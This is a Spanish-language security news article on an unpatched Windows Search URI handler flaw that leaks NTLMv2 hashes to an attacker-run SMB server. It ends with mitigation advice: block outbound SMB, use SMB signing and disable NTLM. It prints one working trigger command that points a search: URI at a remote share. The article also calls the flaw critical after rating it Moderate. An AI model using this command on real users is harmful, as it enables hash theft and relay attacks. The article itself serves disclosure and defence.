Vulnerabilidad en Windows Search expone NTLMv2 a ataques
Publicado el
Vulnerabilidad en Windows Search
Recientes investigaciones han puesto al descubierto una vulnerabilidad no parcheada en el manejador URI de Windows Search. Esta falla permite a los atacantes robar los hashes NTLMv2 de los usuarios, exponiendo así información sensible que podría ser utilizada para realizar ataques de relay en redes.
Descripción del problema
El problema se asemeja a la vulnerabilidad CVE-2026-33829, que afectó al manejador URI de la herramienta de recorte de Windows, permitiendo la exposición de información sensible a actores no autorizados. En este caso, la vulnerabilidad reside en el manejador URI de búsqueda, según el análisis realizado por Huntress. La situación se agrava por el hecho de que Microsoft no ha abordado esta cuestión tras su divulgación responsable el 15 de abril de 2026, argumentando que solo los casos de severidad Importante y Crítica cumplen con sus criterios de atención.
Mecanismo de ataque
Los atacantes pueden inducir a los usuarios a hacer clic en un enlace especialmente diseñado en un navegador web o en otros medios, como correos electrónicos. Si el usuario acepta el enlace, este puede conectar el ordenador a un servidor SMB controlado por el atacante, revelando el hash NTLMv2 del usuario. Esto se logra mediante un comando que utiliza el manejador URI de búsqueda, como en el siguiente ejemplo:
```bash start "" "search:query=test&crumb=location:\10.0.1.100\share" ```
Este mecanismo de fuga de NTLM utiliza el mismo método que la vulnerabilidad anterior, produciendo el mismo tipo de filtración de hash y manteniendo los mismos requisitos operativos. Andrew Schwartz, investigador de Huntress, destacó que este nuevo problema, al igual que su predecesor, tiene una clasificación de severidad Moderada.
Consecuencias y recomendaciones
La explotación de esta vulnerabilidad podría permitir a los atacantes llevar a cabo ataques de relay, facilitando un acceso más profundo a las redes comprometidas. Para mitigar este riesgo, se recomienda a los administradores de sistemas que bloqueen el tráfico saliente de SMB (puertos TCP/445 y TCP/139) en los equipos que no lo requieran. También se sugiere aplicar SMB signing para que los hashes capturados no puedan ser reutilizados contra servicios internos y desactivar NTLM donde sea posible.
Conclusión
La falta de un parche por parte de Microsoft para esta vulnerabilidad crítica subraya la importancia de implementar medidas de seguridad adicionales en entornos que utilizan servicios SMB. La comunidad de ciberseguridad sigue vigilante ante esta situación, esperando una respuesta adecuada que proteja a los usuarios de estos riesgos emergentes.